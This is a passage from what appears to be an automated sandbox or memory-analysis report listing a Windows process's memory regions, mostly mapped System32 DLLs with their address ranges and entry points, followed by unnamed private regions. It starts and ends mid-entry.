filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll")
Region:
id = 2176
start_va = 0x7fef4ed0000
end_va = 0x7fef4ee3fff
entry_point = 0x7fef4ed1070
region_type = mapped_file
name = "wbemsvc.dll"
filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")
Region:
id = 2177
start_va = 0x7fef4ef0000
end_va = 0x7fef4f5efff
entry_point = 0x7fef4ef0000
region_type = mapped_file
name = "esscli.dll"
filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll")
Region:
id = 2178
start_va = 0x7fef4f60000
end_va = 0x7fef508efff
entry_point = 0x7fef4f60000
region_type = mapped_file
name = "wbemcore.dll"
filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll")
Region:
id = 2179
start_va = 0x7fef50e0000
end_va = 0x7fef5106fff
entry_point = 0x7fef50e11a0
region_type = mapped_file
name = "ntdsapi.dll"
filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll")
Region:
id = 2180
start_va = 0x7fef5110000
end_va = 0x7fef51f1fff
entry_point = 0x7fef5133814
region_type = mapped_file
name = "fastprox.dll"
filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")
Region:
id = 2181
start_va = 0x7fef5240000
end_va = 0x7fef52c5fff
entry_point = 0x7fef524ffd0
region_type = mapped_file
name = "wbemcomn.dll"
filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll")
Region:
id = 2182
start_va = 0x7fef52d0000
end_va = 0x7fef530ffff
entry_point = 0x7fef52d0000
region_type = mapped_file
name = "wmisvc.dll"
filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll")
Region:
id = 2183
start_va = 0x7fef6660000
end_va = 0x7fef66d3fff
entry_point = 0x7fef66666f0
region_type = mapped_file
name = "netprofm.dll"
filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll")
Region:
id = 2184
start_va = 0x7fef66e0000
end_va = 0x7fef66f0fff
entry_point = 0x7fef66e0000
region_type = mapped_file
name = "ssdpapi.dll"
filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll")
Region:
id = 2185
start_va = 0x7fef6700000
end_va = 0x7fef6763fff
entry_point = 0x7fef6701254
region_type = mapped_file
name = "webio.dll"
filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll")
Region:
id = 2186
start_va = 0x7fef6770000
end_va = 0x7fef67e0fff
entry_point = 0x7fef6771010
region_type = mapped_file
name = "winhttp.dll"
filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll")
Region:
id = 2187
start_va = 0x7fef7370000
end_va = 0x7fef7386fff
entry_point = 0x7fef7370000
region_type = mapped_file
name = "vsstrace.dll"
filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll")
Region:
id = 2188
start_va = 0x7fef7390000
end_va = 0x7fef753ffff
entry_point = 0x7fef7390000
region_type = mapped_file
name = "vssapi.dll"
filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll")
Region:
id = 2189
start_va = 0x7fefa7e0000
end_va = 0x7fefa7fafff
entry_point = 0x7fefa7e0000
region_type = mapped_file
name = "cabinet.dll"
filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll")
Region:
id = 2190
start_va = 0x7fefadc0000
end_va = 0x7fefadd0fff
entry_point = 0x7fefadc14c0
region_type = mapped_file
name = "rtutils.dll"
filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll")
Region:
id = 2191
start_va = 0x7fefaf10000
end_va = 0x7fefaf23fff
entry_point = 0x7fefaf10000
region_type = mapped_file
name = "samcli.dll"
filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll")
Region:
id = 2192
start_va = 0x7fefb560000
end_va = 0x7fefb5b5fff
entry_point = 0x7fefb56bbc0
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 2193
start_va = 0x7fefb5c0000
end_va = 0x7fefb5dcfff
entry_point = 0x7fefb5c0000
region_type = mapped_file
name = "samlib.dll"
filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll")
Region:
id = 2194
start_va = 0x7fefb900000
end_va = 0x7fefb976fff
entry_point = 0x7fefb900000
region_type = mapped_file
name = "taskcomp.dll"
filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll")
Region:
id = 2195
start_va = 0x7fefb980000
end_va = 0x7fefb9b4fff
entry_point = 0x7fefb981064
region_type = mapped_file
name = "xmllite.dll"
filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll")
Region:
id = 2196
start_va = 0x7fefb9c0000
end_va = 0x7fefb9c9fff
entry_point = 0x7fefb9c0000
region_type = mapped_file
name = "ktmw32.dll"
filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll")
Region:
id = 2197
start_va = 0x7fefb9d0000
end_va = 0x7fefbae1fff
entry_point = 0x7fefb9d0000
region_type = mapped_file
name = "schedsvc.dll"
filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll")
Region:
id = 2198
start_va = 0x7fefbaf0000
end_va = 0x7fefbafefff
entry_point = 0x7fefbaf0000
region_type = mapped_file
name = "wiarpc.dll"
filename = "\\Windows\\System32\\wiarpc.dll" (normalized: "c:\\windows\\system32\\wiarpc.dll")
Region:
id = 2199
start_va = 0x7fefbb00000
end_va = 0x7fefbb14fff
entry_point = 0x7fefbb01050
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 2200
start_va = 0x7fefbb20000
end_va = 0x7fefbb2bfff
entry_point = 0x7fefbb218a4
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 2201
start_va = 0x7fefbb30000
end_va = 0x7fefbb45fff
entry_point = 0x7fefbb311a0
region_type = mapped_file
name = "netapi32.dll"
filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")
Region:
id = 2202
start_va = 0x7fefbb50000
end_va = 0x7fefbb58fff
entry_point = 0x7fefbb50000
region_type = mapped_file
name = "fvecerts.dll"
filename = "\\Windows\\System32\\fvecerts.dll" (normalized: "c:\\windows\\system32\\fvecerts.dll")
Region:
id = 2203
start_va = 0x7fefbb60000
end_va = 0x7fefbb68fff
entry_point = 0x7fefbb60000
region_type = mapped_file
name = "tbs.dll"
filename = "\\Windows\\System32\\tbs.dll" (normalized: "c:\\windows\\system32\\tbs.dll")
Region:
id = 2204
start_va = 0x7fefbb70000
end_va = 0x7fefbbc5fff
entry_point = 0x7fefbb70000
region_type = mapped_file
name = "fveapi.dll"
filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll")
Region:
id = 2205
start_va = 0x7fefbbd0000
end_va = 0x7fefbc2dfff
entry_point = 0x7fefbbd0000
region_type = mapped_file
name = "shsvcs.dll"
filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll")
Region:
id = 2206
start_va = 0x7fefbc30000
end_va = 0x7fefbc47fff
entry_point = 0x7fefbc31bf8
region_type = mapped_file
name = "dhcpcsvc.dll"
filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll")
Region:
id = 2207
start_va = 0x7fefbc50000
end_va = 0x7fefbc60fff
entry_point = 0x7fefbc516ac
region_type = mapped_file
name = "dhcpcsvc6.dll"
filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll")
Region:
id = 2208
start_va = 0x7fefbc80000
end_va = 0x7fefbcd2fff
entry_point = 0x7fefbc82b98
region_type = mapped_file
name = "fwpuclnt.dll"
filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll")
Region:
id = 2209
start_va = 0x7fefbdd0000
end_va = 0x7fefbddafff
entry_point = 0x7fefbdd1198
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 2210
start_va = 0x7fefbde0000
end_va = 0x7fefbe06fff
entry_point = 0x7fefbde98bc
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 2211
start_va = 0x7fefbe30000
end_va = 0x7fefbe43fff
entry_point = 0x7fefbe30000
region_type = mapped_file
name = "sens.dll"
filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll")
Region:
id = 2212
start_va = 0x7fefbe50000
end_va = 0x7fefbeb6fff
entry_point = 0x7fefbe66060
region_type = mapped_file
name = "es.dll"
filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll")
Region:
id = 2213
start_va = 0x7fefbec0000
end_va = 0x7fefbed0fff
entry_point = 0x7fefbec1070
region_type = mapped_file
name = "wtsapi32.dll"
filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")
Region:
id = 2214
start_va = 0x7fefbee0000
end_va = 0x7fefbeeafff
entry_point = 0x7fefbee4f8c
region_type = mapped_file
name = "slc.dll"
filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll")
Region:
id = 2215
start_va = 0x7fefbef0000
end_va = 0x7fefbefbfff
entry_point = 0x7fefbef15d8
region_type = mapped_file
name = "dsrole.dll"
filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll")
Region:
id = 2216
start_va = 0x7fefbf00000
end_va = 0x7fefbf0ffff
entry_point = 0x7fefbf00000
region_type = mapped_file
name = "themeservice.dll"
filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll")
Region:
id = 2217
start_va = 0x7fefbf10000
end_va = 0x7fefbf28fff
entry_point = 0x7fefbf111a8
region_type = mapped_file
name = "atl.dll"
filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll")
Region:
id = 2218
start_va = 0x7fefbf30000
end_va = 0x7fefbf66fff
entry_point = 0x7fefbf30000
region_type = mapped_file
name = "profsvc.dll"
filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll")
Region:
id = 2219
start_va = 0x7fefbf70000
end_va = 0x7fefbf84fff
entry_point = 0x7fefbf760d8
region_type = mapped_file
name = "nlaapi.dll"
filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")
Region:
id = 2220
start_va = 0x7fefbf90000
end_va = 0x7fefc051fff
entry_point = 0x7fefbf90000
region_type = mapped_file
name = "gpsvc.dll"
filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll")
Region:
id = 2221
start_va = 0x7fefc060000
end_va = 0x7fefc253fff
entry_point = 0x7fefc1ec924
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll")
Region:
id = 2222
start_va = 0x7fefc4b0000
end_va = 0x7fefc4ccfff
entry_point = 0x7fefc4b0000
region_type = mapped_file
name = "mmcss.dll"
filename = "\\Windows\\System32\\mmcss.dll" (normalized: "c:\\windows\\system32\\mmcss.dll")
Region:
id = 2223
start_va = 0x7fefc4d0000
end_va = 0x7fefc4d8fff
entry_point = 0x7fefc4d0000
region_type = mapped_file
name = "avrt.dll"
filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll")
Region:
id = 2224
start_va = 0x7fefc4e0000
end_va = 0x7fefc60bfff
entry_point = 0x7fefc4e94bc
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")
Region:
id = 2225
start_va = 0x7fefc740000
end_va = 0x7fefc76cfff
entry_point = 0x7fefc741010
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 2226
start_va = 0x7fefc910000
end_va = 0x7fefc91bfff
entry_point = 0x7fefc911064
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 2227
start_va = 0x7fefc920000
end_va = 0x7fefc9dafff
entry_point = 0x7fefc920000
region_type = mapped_file
name = "firewallapi.dll"
filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll")
Region:
id = 2228
start_va = 0x7fefc9e0000
end_va = 0x7fefc9e6fff
entry_point = 0x7fefc9e14b0
region_type = mapped_file
name = "wshtcpip.dll"
filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll")
Region:
id = 2229
start_va = 0x7fefcad0000
end_va = 0x7fefcaeafff
entry_point = 0x7fefcad2068
region_type = mapped_file
name = "gpapi.dll"
filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")
Region:
id = 2230
start_va = 0x7fefcaf0000
end_va = 0x7fefcb0dfff
entry_point = 0x7fefcaf13b8
region_type = mapped_file
name = "userenv.dll"
filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll")
Region:
id = 2231
start_va = 0x7fefcb10000
end_va = 0x7fefcb21fff
entry_point = 0x7fefcb10000
region_type = mapped_file
name = "devrtl.dll"
filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll")
Region:
id = 2232
start_va = 0x7fefcb30000
end_va = 0x7fefcb4efff
entry_point = 0x7fefcb30000
region_type = mapped_file
name = "spinf.dll"
filename = "\\Windows\\System32\\SPInf.dll" (normalized: "c:\\windows\\system32\\spinf.dll")
Region:
id = 2233
start_va = 0x7fefcc00000
end_va = 0x7fefcc38fff
entry_point = 0x7fefcc00000
region_type = mapped_file
name = "ubpm.dll"
filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll")
Region:
id = 2234
start_va = 0x7fefcc40000
end_va = 0x7fefcc49fff
entry_point = 0x7fefcc43cb8
region_type = mapped_file
name = "credssp.dll"
filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll")
Region:
id = 2235
start_va = 0x7fefcc50000
end_va = 0x7fefcc5cfff
entry_point = 0x7fefcc50000
region_type = mapped_file
name = "pcwum.dll"
filename = "\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll")
Region:
id = 2236
start_va = 0x7fefcd40000
end_va = 0x7fefcd86fff
entry_point = 0x7fefcd41064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 2237
start_va = 0x7fefce30000
end_va = 0x7fefce5ffff
entry_point = 0x7fefce30000
region_type = mapped_file
name = "logoncli.dll"
filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll")
Region:
id = 2238
start_va = 0x7fefce60000
end_va = 0x7fefcebafff
entry_point = 0x7fefce66940
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 2239
start_va = 0x7fefcfd0000
end_va = 0x7fefcfd6fff
entry_point = 0x7fefcfd142c
region_type = mapped_file
name = "wship6.dll"
filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll")
Region:
id = 2240
start_va = 0x7fefcfe0000
end_va = 0x7fefd034fff
entry_point = 0x7fefcfe1054
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")
Region:
id = 2241
start_va = 0x7fefd040000
end_va = 0x7fefd056fff
entry_point = 0x7fefd0432b8
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 2242
start_va = 0x7fefd160000
end_va = 0x7fefd169fff
entry_point = 0x7fefd160000
region_type = mapped_file
name = "sysntfy.dll"
filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll")
Region:
id = 2243
start_va = 0x7fefd1f0000
end_va = 0x7fefd21efff
entry_point = 0x7fefd1f0000
region_type = mapped_file
name = "authz.dll"
filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll")
Region:
id = 2244
start_va = 0x7fefd230000
end_va = 0x7fefd29cfff
entry_point = 0x7fefd230000
region_type = mapped_file
name = "wevtapi.dll"
filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll")
Region:
id = 2245
start_va = 0x7fefd2a0000
end_va = 0x7fefd2b3fff
entry_point = 0x7fefd2a0000
region_type = mapped_file
name = "cryptdll.dll"
filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll")
Region:
id = 2246
start_va = 0x7fefd500000
end_va = 0x7fefd531fff
entry_point = 0x7fefd500000
region_type = mapped_file
name = "netjoin.dll"
filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll")
Region:
id = 2247
start_va = 0x7fefd540000
end_va = 0x7fefd562fff
entry_point = 0x7fefd541198
region_type = mapped_file
name = "srvcli.dll"
filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")
Region:
id = 2248
start_va = 0x7fefd5e0000
end_va = 0x7fefd5eafff
entry_point = 0x7fefd5e1030
region_type = mapped_file
name = "secur32.dll"
filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")
Region:
id = 2249
start_va = 0x7fefd610000
end_va = 0x7fefd634fff
entry_point = 0x7fefd619658
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 2250
start_va = 0x7fefd640000
end_va = 0x7fefd64efff
entry_point = 0x7fefd641010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 2251
start_va = 0x7fefd650000
end_va = 0x7fefd6e0fff
entry_point = 0x7fefd651440
region_type = mapped_file
name = "sxs.dll"
filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll")
Region:
id = 2252
start_va = 0x7fefd6f0000
end_va = 0x7fefd72cfff
entry_point = 0x7fefd6f18f4
region_type = mapped_file
name = "winsta.dll"
filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")
Region:
id = 2253
start_va = 0x7fefd730000
end_va = 0x7fefd743fff
entry_point = 0x7fefd7310e0
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 2254
start_va = 0x7fefd750000
end_va = 0x7fefd75efff
entry_point = 0x7fefd7519b0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 2255
start_va = 0x7fefd7f0000
end_va = 0x7fefd7fefff
entry_point = 0x7fefd7f1020
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 2256
start_va = 0x7fefd800000
end_va = 0x7fefd839fff
entry_point = 0x7fefd801320
region_type = mapped_file
name = "wintrust.dll"
filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")
Region:
id = 2257
start_va = 0x7fefd840000
end_va = 0x7fefd9a6fff
entry_point = 0x7fefd8410c0
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 2258
start_va = 0x7fefd9b0000
end_va = 0x7fefd9c9fff
entry_point = 0x7fefd9b1558
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 2259
start_va = 0x7fefd9d0000
end_va = 0x7fefda3afff
entry_point = 0x7fefd9d30e0
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 2260
start_va = 0x7fefda40000
end_va = 0x7fefda75fff
entry_point = 0x7fefda41474
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 2261
start_va = 0x7fefdb40000
end_va = 0x7fefdb6dfff
entry_point = 0x7fefdb41010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2262
start_va = 0x7fefdb70000
end_va = 0x7fefdd46fff
entry_point = 0x7fefdb71010
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")
Region:
id = 2263
start_va = 0x7fefdd50000
end_va = 0x7fefddeefff
entry_point = 0x7fefdd525a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 2264
start_va = 0x7fefde70000
end_va = 0x7fefdf46fff
entry_point = 0x7fefde73274
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 2265
start_va = 0x7fefdf50000
end_va = 0x7fefdf5dfff
entry_point = 0x7fefdf51080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 2266
start_va = 0x7fefe1c0000
end_va = 0x7fefe3c2fff
entry_point = 0x7fefe1e3330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 2267
start_va = 0x7fefe550000
end_va = 0x7fefe5e8fff
entry_point = 0x7fefe551c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 2268
start_va = 0x7fefe5f0000
end_va = 0x7fefe63cfff
entry_point = 0x7fefe5f1070
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 2269
start_va = 0x7fefe640000
end_va = 0x7fefe76cfff
entry_point = 0x7fefe68ed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 2270
start_va = 0x7fefe770000
end_va = 0x7fefe7e0fff
entry_point = 0x7fefe781e20
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 2271
start_va = 0x7fefe7f0000
end_va = 0x7fefe841fff
entry_point = 0x7fefe7f10d4
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 2272
start_va = 0x7fefe850000
end_va = 0x7feff5d7fff
entry_point = 0x7fefe8ccebc
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 2273
start_va = 0x7feff710000
end_va = 0x7feff818fff
entry_point = 0x7feff711064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 2274
start_va = 0x7feff8c0000
end_va = 0x7feff8defff
entry_point = 0x7feff8c60e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 2275
start_va = 0x7feff8e0000
end_va = 0x7feff9bafff
entry_point = 0x7feff900760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 2276
start_va = 0x7feff9c0000
end_va = 0x7feff9c7fff
entry_point = 0x7feff9c1504
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 2277
start_va = 0x7feff9d0000
end_va = 0x7feffa36fff
entry_point = 0x7feff9db03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 2278
start_va = 0x7feffa40000
end_va = 0x7feffb08fff
entry_point = 0x7feffaba874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 2279
start_va = 0x7feffb20000
end_va = 0x7feffb20fff
entry_point = 0x7feffb20000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 2280
start_va = 0x7fffff54000
end_va = 0x7fffff55fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff54000"
filename = ""
Region:
id = 2281
start_va = 0x7fffff56000
end_va = 0x7fffff57fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff56000"
filename = ""
Region:
id = 2282
start_va = 0x7fffff58000
end_va = 0x7fffff59fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff58000"
filename = ""
Region:
id = 2283
start_va = 0x7fffff5a000
end_va = 0x7fffff5bfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff5a000"
filename = ""
Region:
id = 2284
start_va = 0x7fffff5c000
end_va = 0x7fffff5dfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff5c000"
filename = ""
Region:
id = 2285
start_va = 0x7fffff5e000
end_va = 0x7fffff5ffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff5e000"
filename = ""
Region:
id = 2286
start_va = 0x7fffff60000
end_va = 0x7fffff61fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff60000"
filename = ""
Region:
id = 2287
start_va = 0x7fffff62000
end_va = 0x7fffff63fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff62000"
filename = ""
Region:
id = 2288
start_va = 0x7fffff66000
end_va = 0x7fffff67fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff66000"
filename = ""
Region:
id = 2289
start_va = 0x7fffff68000
end_va = 0x7fffff69fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff68000"
filename = ""
Region:
id = 2290
start_va = 0x7fffff6c000
end_va = 0x7fffff6dfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff6c000"
filename = ""
Region:
id = 2291
start_va = 0x7fffff6e000
end_va = 0x7fffff6ffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff6e000"
filename = ""
Region:
id = 2292
start_va = 0x7fffff70000
end_va = 0x7fffff71fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff70000"
filename = ""
Region:
id = 2293
start_va = 0x7fffff76000
end_va = 0x7fffff77fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff76000"
filename = ""
Region:
id = 2294
start_va = 0x7fffff78000
end_va = 0x7fffff79fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff78000"
filename = ""
Region:
id = 2295
start_va = 0x7fffff7a000
end_va = 0x7fffff7bfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff7a000"
filename = ""
Region:
id = 2296
start_va = 0x7fffff7c000
